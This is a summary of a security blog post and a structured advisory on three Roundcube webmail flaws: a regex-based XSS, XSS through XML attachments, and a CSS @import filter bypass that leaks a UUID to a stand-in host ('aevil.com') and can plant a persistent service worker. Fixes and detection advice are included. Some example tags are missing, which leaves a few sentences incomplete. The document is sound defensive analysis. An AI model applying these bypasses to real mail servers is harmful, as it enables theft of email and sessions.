Full Report
Roundcube is an open source webmail software that enables users to check emails in their browser. Many government agencies use it, making it a good target for exploitation. Naturally, the biggest threat is XSS on an email. Roundcube contains its own email sanitization called washtml, which they couldn't find any vulnerabilities in. Once the sanitization is done though, some modifications were being made. When rendering emails, it doesn't put the content into an iFrame - it just creates a raw HTML page. When rendering, it needs to remove all of the body, head and other tags in it though. This is where the first issue is at. The replacement of tags and values is done using a simple regex. When processing the bgcolor regex, its performing attribute parsing and substitution. The regex /\s?bgcolor=["\']*[a-z0-9#]+["\']*/i handles for all possible delimiters. However, it does not consider the case that bgcolor=XXX could be placed inside of another attribute. The author provides an example of a body field with . The bgcolor and closing double quote are matched and removed. This leads to the new tags looking like . What's interesting about the regex is that it should only work if it finds the same element (",') to open and close. However, it will happily parse the value with no quotes and close on a quote. Man, regexes are terrible! Clicking on the open button for an attachment simply adds the _download=1 query parameter. The Content-Disposition header will set this as an attachment or inline it. The filename, MIME type and charset are all sent with the data. The MIME type being used has no checks and comes only from the filetype. While html and svgs are sanitized, nothing else is. The author of the post found that XML files could bypass check and still render HTML. This last bug was a known issue but theoretically fixed by disabling the Open button for xml files. If it was possible to get a link to the file directly, the XSS would be possible but IMAP uses a random ID. Since Roundcube is missing good protections like CSP and sandboxing, the author looked to find a way to leak this link. The main defense against CSS leaks is via a regex-based blocklist filter on the CSS text. It tries to ban usages of url() and @import for remote connections. For @import rules, the word is blocked except when followed by an a to allow for the important keyword. Notably, a stripped down version of CSS is being verified and not the full CSS page. The allowance of an a for important and the normalization for verification allows for the usage of import aevil.com! Now, using previously known techniques, we can leak the UUID from the page via CSS. Using the same vulnerability, styles can be added to make a link in the email to overlay all elements that will redirect to the XML XSS page. If you don't fix the root cause of the problem, then you're going to get hit! A service worker is a script stored in the browser for every HTTP request on a page. Being able to control a service worker would mean a permanent backdoor, unlike normal stored XSS. The specification tries to mitigate this risk by forcing the service worker script to be hosted on the same origin and be served with a JS content-type header. In the case of RoundCube, attackers can serve arbitrary JS files as attachments from the previous bug with the JavaScript content-type. Using one of the two XSS from above, an attacker could register a malicious service worker for a permanent backdoor. Nasty! Bug 1 was fixed by properly escaping attributes and stopping usage of the bad regex. Bug 2 was fixed by changing dangerous MIME types to text/plain. Bug 3 was fixed by looking for @import and not stripping the CSS before checks. The author mentions that this would have been better if sandboxing or a good CSP was used too. Overall, an awesome post on a series of weird and novel bugs. I like the destruction of the regex parsers here - definitely something to keep an eye out for.
Analysis Summary
# Vulnerability: Multiple XSS and CSS Injection Flaws in Roundcube Webmail
## CVE Details
- **CVE ID:**
- **CVE-2024-42009:** Critical XSS via malformed HTML attributes (No user interaction required).
- **CVE-2024-42008:** High-severity XSS via malicious attachments (Requires one click).
- **CVE-2024-42010:** Information Leak/CSS Injection via broken filter bypass.
- **CVSS Score:** Critical/High (Specific numerical scores not provided in text, but categorized as such by Sonar).
- **CWE:** CWE-79 (Cross-site Scripting), CWE-20 (Improper Input Validation).
## Affected Systems
- **Products:** Roundcube Webmail.
- **Versions:**
- 1.6.x versions prior to **1.6.8**.
- 1.5.x versions prior to **1.5.8**.
- **Configurations:** Default installations rendering emails without a functional Content Security Policy (CSP).
## Vulnerability Description
The primary threat involves a failure in the "desanitization" process after initial cleaning by the `washtml` library.
1. **Regex Failure (CVE-2024-42009):** Roundcube uses a regular expression `/\s?bgcolor=["\']*[a-z0-9#]+["\']*/i` to strip certain attributes. Because the regex does not account for nested attributes or mismatched quotes, an attacker can craft a tag where the regex prematurely clips an attribute, "liberating" malicious JavaScript (e.g., `onload`) from what appeared to be a standard string.
2. **MIME Type Bypass (CVE-2024-42008):** Roundcube failed to properly sanitize or restrict certain MIME types (notably XML). An attacker can upload a malicious XML file as an attachment; when viewed, it renders as HTML in the browser's context.
3. **CSS Filter Bypass (CVE-2024-42010):** The CSS blocklist filter intended to stop `url()` and `@import` was flawed. It allowed `@import` if followed by an `a` (intended for `!important`). Attackers could use `@import a[url]` to bypass the check and leak sensitive tokens (like UUIDs) via CSS injection.
## Exploitation
- **Status:** PoC available; historically, similar vulnerabilities in Roundcube have been exploited in the wild by APT groups (e.g., Winter Vivern).
- **Complexity:** Medium.
- **Attack Vector:** Network (Email-based). An attacker sends a specially crafted email to the victim.
## Impact
- **Confidentiality:** High. Attackers can steal emails, contacts, and session tokens.
- **Integrity:** High. Attackers can send emails from the victim's account or register a **Service Worker** for a permanent backdoor/persistent XSS.
- **Availability:** Low.
## Remediation
### Patches
Update to the following versions immediately:
- **Roundcube 1.6.8**
- **Roundcube 1.5.8**
### Workarounds
- Implement a strict **Content Security Policy (CSP)** to prevent unauthorized external script execution.
- Use browser sandboxing for email rendering where possible.
- Disable the "Open" button for dangerous or unknown attachment types at the server level.
## Detection
- **Indicators of Compromise:** Unusual `@import` rules in captured email traffic or database entries; unexpected Service Worker registrations in user browsers; XML attachments with embedded HTML/script tags.
- **Detection methods and tools:** Static analysis of Roundcube installations for outdated versions; monitoring web server logs for access to attachment UUIDs by unauthorized IPs.
## References
- **Vendor Advisory:** hxxps[://]github[.]com/roundcube/roundcubemail/releases/tag/1.6.8
- **Sonar Technical Analysis:** hxxps[://]www[.]sonarsource[.]com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/
- **Related APT Research:** hxxps[://]www[.]welivesecurity[.]com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/